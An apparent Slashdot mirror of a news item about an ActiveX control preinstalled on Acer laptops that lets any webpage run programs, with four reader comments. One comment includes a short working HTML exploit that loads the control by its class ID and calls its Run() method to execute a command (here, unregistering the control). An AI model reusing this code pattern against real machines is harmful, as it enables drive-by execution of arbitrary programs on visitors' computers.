Slashdot Mirror

← Back to Stories (view on slashdot.org)

Acer May Be Bugging Computers

Posted by Zonk on from the might-want-to-look-into-this dept.

tomjen writes "What if a well known laptop company had silently placed an ActiveX Control on their computers that allowed any webpage to execute any program? Well Acer apparently has and they have (based on the last modified-by date of the file) been doing this since 1998. 'Checking the interface of the control reveals it has a method named "Run()" as shown below. The method supports parameters "Drive", "FileName", and "CmdLine". Isn't it strange for a control that's marked "safe for scripting" to allow a method that is suggestive of possible abuse?'"

4 of 396 comments (clear)

  1. Lessons learned... by Anonymous Coward · · Score: 5, Insightful

    1) Whenever possible, build your own.

    2) When you can't build your own (laptops), *always* re-install your OS after purchasing a new computer, and for God's sake use a real install CD and not the recovery one provided by the manufacturer.

  2. Re:On behalf of Acer by sunwukong · · Score: 5, Insightful

    But do you know they haven't placed a rootkit on the preinstalled Linux?

  3. Re:present on Aspire 1690 by Staale+Nordlie · · Score: 5, Insightful

    Why not just create a website that will use this vulnerability to run this "unregister" command on our machines and eliminate the vulnerability? I copied the command posted by valeurnutritive into the html demonstration code from the article. Worked just fine as far as I can tell. It has a certain poetry to it. :)

    <html>
    <body>
    <object classid="clsid:D9998BD0-7957-11D2-8FED-00606730D3A A" id="hahaha">
    </object>
    <script>
    hahaha.Run("c", "\\windows\\system32\\regsvr32.exe -u lunchapp.ocx", "");
    </script>
    </html>
    </body>
  4. Re:@mozilla.org/process/util;1 by h2g2bob · · Score: 5, Insightful

    Exactly, that's for extensions (and the browser itself) and is protected from execution by web pages. Exploits to either firefox or it's extensions or themes can lead to pwnage (same as any internet-capable program).

    The difference between ie activex and fx extensions is that firefox encourages you to go through addons.mozilla.org, for which all the extensions are reviewed (though I don't know how thoroughly) and update automatically (eg if exploits are found).